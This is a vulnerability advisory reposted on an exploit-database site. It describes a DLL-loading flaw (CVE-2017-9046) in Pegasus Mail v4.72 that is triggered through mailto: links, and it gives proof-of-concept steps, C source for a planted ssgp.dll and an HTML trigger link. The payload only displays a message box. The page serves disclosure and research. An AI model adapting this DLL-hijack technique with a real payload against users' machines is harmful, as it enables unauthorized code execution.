[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Pegasus winpm-32.exe v4.72 Mailto: Link Remote Code Execution Vulnerability

Author
hyp3rlinx
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-27812
Category
remote exploits
Date add
20-05-2017
CVE
CVE-2017-9046
Platform
windows
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC



Vendor:
=============
www.pmail.com



Product:
===========================
Pegasus "winpm-32.exe"
v4.72 build 572


Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single
computers or on local area networks. A proven product, it has served millions of users since it was released in 1990.



Vulnerability Type:
======================
Remote Code Execution




CVE Reference:
==============
CVE-2017-9046



Security Issue:
================
Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by clicking an HTML "mailto:" link
if a DLL named "ssgp.dll" exists on the victims Desktop. Tested successfully using Internet Explorer Web Browser.

e.g.

<a href="mailto:name@victim.com">Link text</a>

Place "ssgp.dll" on the desktop then visit the webpage in "Internet Explorer", click the mailto: link arbitrary code executed
and Pegasus (pmail) is then launched.

User needs to have setup PMAIL with "mailto:" link option on install.


Exploit:
========
1) Set Pegasus as default Email client for opening Emails, and setup PMAIL with "mailto:" link option on install.


2) Compile "ssgp.dll" as DLL using below 'C' code.

#include<windows.h>

//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
switch (reason) {
case DLL_PROCESS_ATTACH:
MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
break;
}

return 0;
}



3) Place "ssgp.dll" on Desktop


4) Create an HTML file with following in the web server root directory.
<a href="mailto:name@victim.com">Pegasus Exploit POC</a>


5) Open webpage in InternetExplorer Web Browser and click malicious mailto: link.


Our code gets executed...

#  0day.today [2024-12-25]  #